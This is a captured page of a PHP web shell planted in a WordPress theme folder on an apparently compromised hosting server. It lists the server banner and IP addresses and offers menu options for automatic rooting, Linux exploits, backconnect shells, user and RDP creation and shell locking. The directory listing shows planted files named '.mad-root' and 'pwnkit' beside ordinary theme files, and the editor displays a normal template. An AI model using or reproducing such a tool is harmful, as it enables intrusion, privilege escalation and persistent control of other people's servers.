Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
tempera /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
803
B
-rw-r--r--
archive.php
2
KB
-rw-r--r--
attachment.php
4.16
KB
-rw-r--r--
author.php
2.69
KB
-rw-r--r--
category.php
1.79
KB
-rw-r--r--
comments.php
1.65
KB
-rw-r--r--
footer.php
655
B
-rw-r--r--
frontpage.php
10.71
KB
-rw-r--r--
functions.php
1.38
KB
-rw-r--r--
header.php
1.67
KB
-rw-r--r--
index.php
738
B
-rw-r--r--
page.php
894
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
32.24
KB
-rw-r--r--
screenshot.png
697.91
KB
-rw-r--r--
search.php
1.67
KB
-rw-r--r--
searchform.php
591
B
-rw-r--r--
sidebar-footer.php
1.74
KB
-rw-r--r--
sidebar-left.php
1.34
KB
-rw-r--r--
sidebar-right.php
1.34
KB
-rw-r--r--
single.php
2.6
KB
-rw-r--r--
style.css
56.77
KB
-rw-r--r--
tag.php
1.78
KB
-rw-r--r--
woocommerce.php
709
B
-rw-r--r--
wpml-config.xml
2.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The Template for displaying all single posts. * * @package Cryout Creations * @subpackage tempera * @since tempera 0.5 */ get_header();?> <section id="container" class="<?php echo tempera_get_layout_class(); ?>"> <div id="content" role="main"> <?php cryout_before_content_hook(); ?> <?php if ( have_posts() ) while ( have_posts() ) : the_post(); ?> <div id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <h1 class="entry-title"><?php the_title(); ?></h1> <?php cryout_post_title_hook(); ?> <div class="entry-meta"> <?php tempera_meta_before(); cryout_post_meta_hook(); ?> </div><!-- .entry-meta --> <div class="entry-content"> <?php the_content(); ?> <?php wp_link_pages( array( 'before' => '<div class="page-link"><span>' . __( 'Pages:', 'tempera' ), 'after' => '</span></div>' ) ); ?> </div><!-- .entry-content --> <?php if ( get_the_author_meta( 'description' ) ) : // If a user has filled out their description, show a bio on their entries ?> <div id="entry-author-info"> <div id="author-avatar"> <?php echo get_avatar( get_the_author_meta( 'user_email' ), apply_filters( 'tempera_author_bio_avatar_size', 60 ) ); ?> </div><!-- #author-avatar --> <div id="author-description"> <h2 class="page-title"><?php echo esc_html( get_the_author() ); ?></h2> <?php the_author_meta( 'description' ); ?> <div id="author-link"> <a href="<?php echo get_author_posts_url( get_the_author_meta( 'ID' ) ); ?>"> <?php printf( __( 'View all posts by ','tempera').'%s <span class="meta-nav">→</span>', esc_attr( get_the_author() ) ); ?> </a> </div><!-- #author-link --> </div><!-- #author-description --> </div><!-- #entry-author-info --> <?php endif; ?> <footer class="entry-meta"> <?php tempera_posted_in(); ?> <?php edit_post_link( __( 'Edit', 'tempera' ), '<span class="edit-link"><i class="crycon-edit crycon-metas"></i> ', '</span>' ); cryout_post_footer_hook(); ?> </footer><!-- .entry-meta --> </div><!-- #post-## --> <div id="nav-below" class="navigation"> <div class="nav-previous"><?php previous_post_link( '%link', '<i class="meta-nav-prev"></i> %title' ); ?></div> <div class="nav-next"><?php next_post_link( '%link', '%title <i class="meta-nav-next"></i>' ); ?></div> </div><!-- #nav-below --> <?php comments_template( '', true ); ?> <?php endwhile; // end of the loop. ?> <?php cryout_after_content_hook(); ?> </div><!-- #content --> <?php tempera_get_sidebar(); ?> </section><!-- #container --> <?php get_footer(); ?>
Close